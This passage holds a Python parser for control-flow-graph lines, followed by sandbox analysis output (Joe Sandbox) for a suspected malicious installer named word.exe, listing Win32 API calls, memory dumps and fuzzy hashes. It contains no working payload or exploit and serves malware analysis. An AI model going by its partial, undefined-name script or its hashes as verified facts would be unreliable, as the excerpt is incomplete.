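# Copied verbatim from the two shorter graphs in this report (CreateDirectoryA helper, UXTHEME loader).
CFG_CREATE_DIRECTORY = (
    "control_flow_graph 574 405346-405391 CreateDirectoryA 575 405393-405395 574->575 "
    "576 405397-4053a4 GetLastError 574->576 578 4053be-4053c0 575->578 "
    "577 4053a6-4053ba SetFileSecurityA 576->577 576->578 577->575 "
    "579 4053bc GetLastError 577->579 579->578"
)
CFG_LOAD_UXTHEME = (
    "control_flow_graph 580 405eba-405eda GetSystemDirectoryA 581 405edc 580->581 "
    "582 405ede-405ee0 580->582 581->582 583 405ef0-405ef2 582->583 584 405ee2-405eea 582->584 "
    "585 405ef3-405f25 wsprintfA LoadLibraryExA 583->585 584->583 586 405eec-405eee 584->586 586->585"
)


@dataclass
class Block:
    node_id: int
    start: int  # first instruction address of the basic block
    end: int    # last instruction address; equals start for a one-instruction block such as 579
    labels: List[str] = field(default_factory=list)  # Win32 API names and "call <addr>" annotations


def parse_cfg(line: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Return ({node_id: Block}, [(src, dst), ...]) for one control_flow_graph line."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        # A node id is decimal and is always followed by a hex address or range.
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        addr = ADDR_RE.match(nxt)
        if tok.isdigit() and addr:
            start = int(addr.group(1), 16)
            end = int(addr.group(2), 16) if addr.group(2) else start
            current = Block(int(tok), start, end)
            blocks[current.node_id] = current
            i += 2
            continue
        if current is None:
            raise ValueError(f"unexpected token before first block: {tok!r}")
        # "call <addr>" marks an intra-module call; keep the pair as one label so the
        # hex target is never mistaken for a node id.
        if tok == "call" and i + 1 < len(tokens):
            current.labels.append(f"call {tokens[i + 1]}")
            i += 2
            continue
        current.labels.append(tok)
        i += 1
    return blocks, edges


def api_calls(blocks: Dict[int, Block]) -> List[str]:
    """Sorted, de-duplicated Win32 API names in the graph (intra-module calls excluded)."""
    return sorted({lab for b in blocks.values() for lab in b.labels if not lab.startswith("call ")})


def entry_blocks(blocks: Dict[int, Block], edges: List[Tuple[int, int]]) -> List[int]:
    """Blocks with no incoming edge; for a well-formed function this is exactly the entry block."""
    targets = {dst for _, dst in edges}
    return sorted(b for b in blocks if b not in targets)


def exit_blocks(blocks: Dict[int, Block], edges: List[Tuple[int, int]]) -> List[int]:
    """Blocks with no outgoing edge (the function's return paths)."""
    sources = {src for src, _ in edges}
    return sorted(b for b in blocks if b not in sources)


def dangling_edges(blocks: Dict[int, Block], edges: List[Tuple[int, int]]) -> List[Tuple[int, int]]:
    """Edges that reference a node id the line never defined; non-empty means a truncated export."""
    return [(s, d) for s, d in edges if s not in blocks or d not in blocks]


def render(blocks: Dict[int, Block], edges: List[Tuple[int, int]]) -> List[str]:
    """One readable line per block, in address order, with its successor ids."""
    succ: Dict[int, List[int]] = {b: [] for b in blocks}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    out = []
    for b in sorted(blocks.values(), key=lambda x: x.start):
        labels = " ".join(b.labels) or "-"
        targets = ", ".join(str(d) for d in succ[b.node_id]) or "(exit)"
        out.append(f"{b.node_id:>4} {b.start:#x}-{b.end:#x}  {labels:<32} -> {targets}")
    return out


if __name__ == "__main__":
    for name, line in (("CreateDirectoryA helper", CFG_CREATE_DIRECTORY), ("UXTHEME loader", CFG_LOAD_UXTHEME)):
        blocks, edges = parse_cfg(line)
        print(f"{name}: {len(blocks)} blocks, {len(edges)} edges, APIs={api_calls(blocks)}")
        print("\n".join(render(blocks, edges)))
```

Two sanity checks are worth running on every parsed line before trusting it: `entry_blocks` should return a single id whose `start` is the lowest address in the graph, and `dangling_edges` should be empty; either failing means the report line was cut off during extraction rather than that the function is unusual.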

                                  Control-flow Graph

                                  control_flow_graph 587 40589e-4058a8 588 4058a9-4058d3 GetTickCount GetTempFileNameA 587->588 589 4058e2-4058e4 588->589 590 4058d5-4058d7 588->590 592 4058dc-4058df 589->592 590->588 591 4058d9 590->591 591->592
                                  APIs
                                  • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\word.exe,004030F9,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004058B1
                                  • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$nsa
                                  • API String ID: 1716503409-3536471476
                                  • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                  • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                  • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                  • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 676 4015b3-4015c6 call 402a29 call 40571f 681 4015c8-4015db call 4056b6 676->681 682 40161c-40161f 676->682 689 4015f3-4015f4 call 4053c3 681->689 690 4015dd-4015e0 681->690 684 401621-40163c call 401423 call 405b98 SetCurrentDirectoryA 682->684 685 40164a-40219c call 401423 682->685 697 4028be-4028cd 684->697 701 401642-401645 684->701 685->697 698 4015f9-4015fb 689->698 690->689 694 4015e2-4015e9 call 4053e0 690->694 694->689 706 4015eb-4015ec call 405346 694->706 702 401612-40161a 698->702 703 4015fd-401602 698->703 701->697 702->681 702->682 707 401604-40160d GetFileAttributesA 703->707 708 40160f 703->708 711 4015f1 706->711 707->702 707->708 708->702 711->698
                                  APIs
                                    • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                    • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                  • String ID: C:\Users\user\AppData\Local\Temp
                                  • API String ID: 1892508949-2935972921
                                  • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                  • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                  • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                  • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 712 40576c-405787 call 405b98 call 40571f 717 405789-40578b 712->717 718 40578d-40579a call 405dfa 712->718 719 4057df-4057e1 717->719 722 4057a6-4057a8 718->722 723 40579c-4057a0 718->723 725 4057be-4057c7 lstrlenA 722->725 723->717 724 4057a2-4057a4 723->724 724->717 724->722 726 4057c9-4057dd call 40568b GetFileAttributesA 725->726 727 4057aa-4057b1 call 405e93 725->727 726->719 732 4057b3-4057b6 727->732 733 4057b8-4057b9 call 4056d2 727->733 732->717 732->733 733->725
                                  APIs
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,mrodzekle Setup,NSIS Error), ref: 00405BA5
                                    • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                  • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057BF
                                  • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID: C:\
                                  • API String ID: 3248276644-3404278061
                                  • Opcode ID: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                  • Instruction ID: 54d673280676c30d7487fb506765264cad7adccc2ba99e33922fd806b78c8ed4
                                  • Opcode Fuzzy Hash: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                  • Instruction Fuzzy Hash: DAF0C829105D509AD222373A5C05ABF2655CE86364F19063BFC55B32D2DB3C8943FD7E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 735 4053f8-405425 CreateProcessA 736 405433-405434 735->736 737 405427-405430 CloseHandle 735->737 737->736
                                  APIs
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                  • CloseHandle.KERNEL32(?), ref: 0040542A
                                  Strings
                                  • Error launching installer, xrefs: 0040540B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: Error launching installer
                                  • API String ID: 3712363035-66219284
                                  • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                  • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                  • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                  • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                  • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                  • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                  • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                  • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                  • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                  • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                  • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                  • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                  • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                  • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                  • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                  • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                  • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                  • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                  • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                  • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                  • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                  • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                  • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                  • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                  • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                    • Part of subcall function 004053F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                    • Part of subcall function 004053F8: CloseHandle.KERNEL32(?), ref: 0040542A
                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
                                  • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
                                  • CloseHandle.KERNEL32(?), ref: 00401EA7
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                  • String ID:
                                  • API String ID: 3521207402-0
                                  • Opcode ID: fee99b61f809a53683fc29f07b08f3b8ec53ffd30f17739a64443d1dd851e78e
                                  • Instruction ID: 9f74951c8685777ff7248368b05c14b320234156a546818c44ddf0e00d329478
                                  • Opcode Fuzzy Hash: fee99b61f809a53683fc29f07b08f3b8ec53ffd30f17739a64443d1dd851e78e
                                  • Instruction Fuzzy Hash: F0015731E04205EBCF21AFA1D984AAE7A71EF00344F54813BF905B61E1C7BC4A41EB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                  • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                  • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                  • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
